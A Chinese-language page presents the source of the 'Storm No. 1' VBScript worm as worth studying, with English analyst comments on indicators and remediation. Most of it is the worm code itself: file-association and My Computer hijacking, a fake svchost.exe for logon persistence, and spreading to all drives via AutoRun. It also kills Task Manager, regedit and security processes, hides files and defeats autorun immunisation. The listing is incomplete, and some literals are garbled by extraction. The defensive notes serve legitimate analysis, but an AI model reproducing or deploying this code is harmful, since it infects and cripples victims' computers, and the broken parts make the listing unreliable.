暴风一号病毒源代码。一些杀毒软件又称其为“1K 快捷方式病毒”,是一个大学生的闲暇之作,值得研究学习。VBS 病毒的鼻祖是马尼拉 AMA 计算机大学的学生编写的“爱虫”病毒,距今已经很久了。
' Script entry point: creates the two COM helper objects the rest of the
' listing relies on (FileSystemObject for file/drive access, WScript.Shell for
' launching processes) and hands control to Main.
' Analyst note: "On Error Resume Next" is set here and again in every routine,
' so failures are silent. The sample shows no error dialogs when an action is
' blocked, and static reading is more reliable than waiting for visible errors.
' NOTE(review): this copy of the listing is damaged by page extraction in
' several places and is reproduced as-is; it is also incomplete (helpers such
' as GetMainVirus, Run, WriteReg and ReadReg are not part of the page).
On Error Resume Next
Dim Fso,Wshshell
Set Fso = CreateObject("Scripting.Filesystemobject")
Set Wshshell = CreateObject("Wscript.Shell")
Call Main()
' Main: dispatches on the command line the script was started with.
' All arguments are joined into Param, and the last three characters
' (lower-cased) are used as a selector. Every named case does the same three
' things: (1) launches the program the user expected, so the hijack is not
' noticed, (2) calls InvadeSystem to (re)install persistence, and (3) starts
' the resident copy through "%SystemRoot%\system\svchost.exe".
' Analyst notes:
'  - InvadeSystem (below) shows that this "svchost.exe" is a copy of
'    WScript.exe placed in %SystemRoot%\system. A process named svchost.exe
'    running from that folder (not System32) with a .vbs argument is a strong
'    host indicator for this family.
'  - The "txt/log/ini/inf", "bat/cmd", "reg", "chm" and "hlp" selectors are file
'    extensions; they line up with the file-association commands InvadeSystem
'    checks, whose value passes "%1 %*" to this script.
'  - "oie", "omc" and "emc" line up with the " OIE ", " OMC " and " EMC "
'    arguments InvadeSystem builds for the Internet Explorer and My Computer
'    shell commands.
'  - "run" and "dir" are presumably passed by the AutoRun/shortcut components
'    (CreateAutoRun / InfectRoot, not shown on this page) - confirm against a
'    complete sample.
Sub Main()
On Error Resume Next
Dim Args, VirusLoad, VirusAss
Set Args = WScript.Arguments
' Two paths returned by GetMainVirus (not shown here): the copy that is kept
' resident (index 1) and the copy wired into the shell associations (index 0).
VirusLoad = GetMainVirus(1)
VirusAss = GetMainVirus(0)
ArgNum = 0
' Join all arguments into one space-separated string.
Do WhileArgNum < Args.Count
Param = Param & " " & Args(ArgNum)
ArgNum = ArgNum + 1
Loop
' Selector = last three characters of the joined arguments.
SubParam = LCase(Right(Param, 3))
Select Case SubParam
Case "run"
' Opens the drive the script was started from (first two characters of its
' own path, e.g. a drive letter and colon) before installing.
RunPath = Left(WScript.ScriptFullName, 2)
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "txt", "log","ini" ,"inf"
' Text-like files are handed to Notepad so the user still sees the file.
RunPath = "%SystemRoot%\system32\NOTEPAD.EXE " & Param
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "bat", "cmd"
' Batch files are NOT executed; a fixed message is shown instead.
RunPath = "CMD /c echo Hi!I'm here!&pause"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "reg"
RunPath = "regedit.exe " & """" & Trim(Param) & """"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "chm"
RunPath = "hh.exe " & """" & Trim(Param) & """"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "hlp"
RunPath = "winhlp32.exe " & """" & Trim(Param) & """"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "dir"
' Strips the trailing three-character selector and opens what remains.
RunPath = """" & Left(Trim(Param),Len(Trim(Param)) - 3) & """"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "oie"
RunPath = """%ProgramFiles%\Internet Explorer\IEXPLORE.EXE"""
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "omc"
' Opens an Explorer window on the same CLSID that InvadeSystem hijacks below.
RunPath = "explorer.exe / n,
{20D04FE0 - 3AEA - 1069 - A2D8 - 08002B30309D}"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "emc"
' Same target as "omc", with an additional explorer.exe switch.
RunPath = "explorer.exe / n, / e,
{20D04FE0 - 3AEA - 1069 - A2D8 - 08002B30309D}"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case Else
' No recognised selector: this is the resident instance. PreDblInstance is
' defined outside this page; presumably a single-instance check - confirm.
If PreDblInstance = True Then
WScript.Quit
End If
Call MonitorSystem()
End Select
End Sub
' MonitorSystem: the resident loop. Every 3000 ms it (1) terminates the listed
' processes, (2) re-runs InvadeSystem so files and registry values are put
' back, and (3) calls KeepProcess (not shown on this page) with the resident
' script path.
' Analyst notes:
'  - The kill list covers Task Manager, the command prompt, regedit (including
'    renamed .scr/.pif/.com copies), msconfig and two security-product process
'    names. Those tools closing immediately after launch is a typical symptom.
'  - Because persistence is rewritten every few seconds, registry or file
'    clean-up done while the script host is still running will be reverted;
'    remediation has to stop the resident process first (or be done offline).
'  - ExeFullNames is declared but never used; VBSFullNames is used without Dim.
Sub MonitorSystem()
On Error Resume Next
Dim ProcessNames, ExeFullNames
ProcessNames = Array("ras.exe", "360tray.exe", "taskmgr.exe", "cmd.exe", "cmd.com", "regedit.exe", "regedit.scr","regedit.pif", "regedit.com", "msconfig.exe")
VBSFullNames = Array(GetMainVirus(1))
' Endless loop; there is no exit condition in this routine.
Do
Call KillProcess(ProcessNames)
Call InvadeSystem(GetMainVirus(1),GetMainVirus(0))
Call KeepProcess(VBSFullNames)
WScript.Sleep 3000
Loop
End Sub
' InvadeSystem: installs (or repairs) every persistence and propagation
' artefact. It is idempotent: each step is guarded by a check of the current
' state, which is why MonitorSystem can call it in a loop.
' Parameters:
'   VirusLoadPath - path of the resident script copy (started via the Load value)
'   VirusAssPath  - path of the script copy used in hijacked shell commands
' Host indicators an analyst can read directly from this routine:
'   - %SystemRoot%\system\svchost.exe that is actually a copy of WScript.exe
'   - HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load pointing
'     at that file, plus sibling values "Ver" and "Date"
'   - shell\open\command for txtfile, inifile, inffile, batfile, cmdfile,
'     regfile, chm.file, hlpfile and iexplore.exe pointing at WScript.exe with
'     a .vbs argument
'   - shell commands under the two CLSIDs checked at the end of the routine
'   - a "<serial>.vbs" file name per drive (created by helpers not shown here)
Sub InvadeSystem(VirusLoadPath,VirusAssPath)
On Error Resume Next
Dim Load_Value, File_Value, IE_Value, MyCpt_Value1, MyCpt_Value2, HCULoad, HCUVer, VirusCode, Version
' Expected registry contents; compared against the live values further down.
Load_Value = "%SystemRoot%\system\svchost.exe " & """" & VirusLoadPath & """"
File_Value = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " %1 %* "
IE_Value = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " OIE "
MyCpt_Value1 = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " OMC "
MyCpt_Value2 = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " EMC "
' Per-user logon persistence value and two bookkeeping values stored beside it.
HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
HCUVer = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver"
HCUDate = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date"
' The script reads its own text (GetCode is not shown) to write out copies.
VirusCode = GetCode(WScript.ScriptFullName)
Version = 1
' GetSpecialFolder(1) is the System folder, GetSpecialFolder(0) the Windows
' folder: the legitimate script host is the source, the look-alike
' "svchost.exe" under \system is the destination.
HostSourcePath = Fso.GetSpecialFolder(1) & "\Wscript.exe"
HostFilePath = Fso.GetSpecialFolder(0) & "\system\svchost.exe"
' Propagation: every ready drive of FSO type 1, 2 or 3 (removable, fixed,
' network) gets a script named after the drive's serial number and is passed
' to CreateAutoRun and InfectRoot (both outside this page).
For Each Drive In Fso.Drives
If Drive.IsReady And (Drive.DriveType = 1 Or Drive.DriveType = 2 Or Drive.DriveType = 3) Then
DiskVirusName = GetSerialNumber(Drive.DriveLetter) & ".vbs"
Call CreateAutoRun(Drive.DriveLetter,DiskVirusName)
Call InfectRoot(Drive.DriveLetter,DiskVirusName)
End If
Next
' (Re)write the script copies and the renamed host if any is missing or the
' recorded version is older than this one.
If FSO.FileExists(VirusAssPath) = False Or FSO.FileExists(VirusLoadPath) = False Or FSO.FileExists(HostFilePath) = False Or GetVersion() < Version Then
' On an NTFS system drive only the host copy is marked hidden; on other file
' systems the two script copies are marked hidden as well.
' NOTE(review): the reason for the difference is not visible here; it depends
' on what GetMainVirus returns for NTFS - confirm against a complete sample.
If GetFileSystemType(GetSystemDrive()) = "NTFS" Then
Call CreateFile(VirusCode,VirusAssPath)
Call CreateFile(VirusCode,VirusLoadPath)
Call CopyFile(HostSourcePath,HostFilePath)
Call SetHiddenAttr(HostFilePath)
Else
Call CreateFile(VirusCode, VirusAssPath)
Call SetHiddenAttr(VirusAssPath)
Call CreateFile(VirusCode,VirusLoadPath)
Call SetHiddenAttr(VirusLoadPath)
Call CopyFile(HostSourcePath, HostFilePath)
Call SetHiddenAttr(HostFilePath)
End If
End If
' Logon persistence and bookkeeping values.
If ReadReg(HCULoad) <> Load_Value Then
Call WriteReg (HCULoad, Load_Value, "")
End If
If GetVersion() < Version Then
Call WriteReg (HCUVer, Version, "")
End If
' The first-infection date is written once and never overwritten, which makes
' the "Date" value useful for incident timelines.
If GetInfectedDate() = "" Then
Call WriteReg (HCUDate, Date, "")
End If
' File-association hijack: each open command is compared with File_Value and
' rewritten by the matching Set*Ass helper (not shown) when it differs.
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\") <> File_Value Then
Call SetTxtFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\command\") <> File_Value Then
Call SetIniFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\command\") <> File_Value Then
Call SetInfFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\command\") <> File_Value Then
Call SetBatFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\") <> File_Value Then
Call SetCmdFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\") <> File_Value Then
Call SetRegFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\") <> File_Value Then
Call SetchmFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\") <> File_Value Then
Call SethlpFileAss(VirusAssPath)
End If
' Internet Explorer launch commands (application entry and a CLSID entry).
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexplore.exe\shell\open\command\") <> IE_Value Then
Call SetIEAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\") <> IE_Value Then
Call SetIEAss(VirusAssPath)
End If
' Open/explore commands on the CLSID that Main's "omc"/"emc" cases reopen.
If ReadReg("HKEY_CLASSES_ROOT\CLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\open\command\") <> MyCpt_Value1 Then
Call SetMyComputerAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\explore\command\") <> MyCpt_Value2 Then
Call SetMyComputerAss(VirusAssPath)
End If
' Finally apply the Explorer/AutoRun settings changes in RegSet.
Call RegSet()
End Sub
' CopyFile: replaces pathf with a copy of source.
' An existing destination is deleted first with the force flag (True), which
' also removes read-only files. Errors are suppressed, so a failed delete or
' copy leaves no trace in the script's own behaviour.
' In this listing it is only used to place the WScript.exe copy.
Sub CopyFile(source, pathf)
On Error Resume Next
If FSO.FileExists(pathf) Then
FSO.DeleteFile pathf , True
End If
FSO.CopyFile source, pathf
End Sub
' CreateFile: writes the text in "code" to pathf, overwriting any previous
' content (OpenTextFile mode 2 = ForWriting). The only difference between the
' two branches is the third argument: an existing file is opened without the
' create flag, a missing file is created.
' Analyst note: every dropped copy is written from the same in-memory text, so
' all copies on a host share one content hash unless the helper that supplies
' the text (GetCode, not shown) alters it - confirm before relying on hashes.
Sub CreateFile(code, pathf)
On Error Resume Next
Dim FileText
If FSO.FileExists(pathf) Then
Set FileText = FSO.OpenTextFile(pathf, 2, False)
FileText.Write code
FileText.Close
Else
Set FileText = FSO.OpenTextFile(pathf, 2, True)
FileText.Write code
FileText.Close
End If
End Sub
' RegSet: changes four Explorer-related registry settings through the
' WriteReg/DeleteReg helpers (not shown on this page).
'   RegPath1 / RegPath2 - CheckedValue under the Folder\Hidden NOHIDDEN and
'       SHOWALL options is set to 3 and 2. These are not the stock values
'       (normally 2 and 1), so the "show hidden files" choice in Folder
'       Options presumably stops taking effect - a commonly reported symptom.
'   RegPath3 - NoDriveTypeAutoRun is set to 0 for the current user, i.e. no
'       drive type is excluded from AutoRun by this per-user policy value.
'   RegPath4 - lnkfile\IsShortcut is deleted. NOTE(review): this value
'       normally controls the shortcut overlay arrow on .lnk icons; removing
'       it would make shortcuts harder to tell apart from real items - confirm.
' Remediation check-list derived from this routine: restore the two
' CheckedValue entries, restore NoDriveTypeAutoRun to the organisation's
' baseline, and recreate the empty IsShortcut string value.
Sub RegSet()
On Error Resume Next
Dim RegPath1 , RegPath2, RegPath3, RegPath4
RegPath1 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue"
RegPath2 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
RegPath3 = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun"
RegPath4 = "HKEY_CLASSES_ROOT\lnkfile\IsShortcut"
Call WriteReg (RegPath1, 3, "REG_DWORD")
Call WriteReg (RegPath2, 2, "REG_DWORD")
Call WriteReg (RegPath3, 0, "REG_DWORD")
Call DeleteReg (RegPath4)
End Sub
' KillProcess: terminates every running process whose image name appears in
' ProcessNames. It queries Win32_Process over WMI for each name and calls
' Terminate; when Terminate returns non-zero it falls back to a hidden
' "ntsd -c q -p <id>" command line.
' Analyst notes:
'  - The WMI moniker literal below was mangled by forum markup ([url] tags and
'    line breaks) when the page was captured; it is reproduced as-is.
'  - Detection opportunities visible here: a script host issuing repeated
'    Win32_Process queries by name, and hidden "CMD /c ntsd -c q -p" child
'    processes spawned from a script host.
'  - IntReturn / intReturn are the same variable (VBScript is case-insensitive).
Sub KillProcess(ProcessNames)
On Error Resume Next
Set WMIService = GetObject("winmgmts
[url = file
/ / \ \ . \ root \ cimv2] \ \ . \ root \ cimv2[ / url]")
For Each ProcessName In ProcessNames
Set ProcessList = WMIService.execquery(" Select * From win32_process where name ='" & ProcessName & "' ")
For Each Process In ProcessList
IntReturn = Process.terminate
If intReturn <> 0 Then
WshShell.Run "CMD /c ntsd -c q -p " & Process.Handle, vbHide, False
End If
Next
Next
End Sub
' KillImmunity: removes a FOLDER named Autorun.inf from the root of drive D.
' Creating such a folder is a widely used "immunisation" trick meant to stop
' an autorun.inf FILE from being written; this routine first uses CACLS to
' change the folder's permissions for "everyone" and then deletes the tree
' with RD /S /Q, both hidden and waited on (third Run argument True).
' Analyst notes:
'  - The two string literals that span lines were broken by page extraction
'    and are reproduced as-is.
'  - Folder-based immunisation therefore does not hold against this family.
'    Disabling AutoRun by policy is the sturdier control; a machine-level
'    policy is presumably needed, since RegSet rewrites the per-user
'    NoDriveTypeAutoRun value - verify on the target Windows version.
'  - Hidden CACLS and RD commands aimed at "<drive>\Autorun.inf" are a useful
'    command-line detection for this behaviour.
Sub KillImmunity(D)
On Error Resume Next
ImmunityFolder = D & "
\ Autorun.inf"
If Fso.FolderExists(ImmunityFolder) Then
WshSHell.Run ("CMD /C CACLS " & """" & ImmunityFolder & """" & " / t / e / c / g everyone
f"),vbHide,True
WshSHell.Run ("CMD /C RD /S /Q " & ImmunityFolder), vbHide, True
End If
End Sub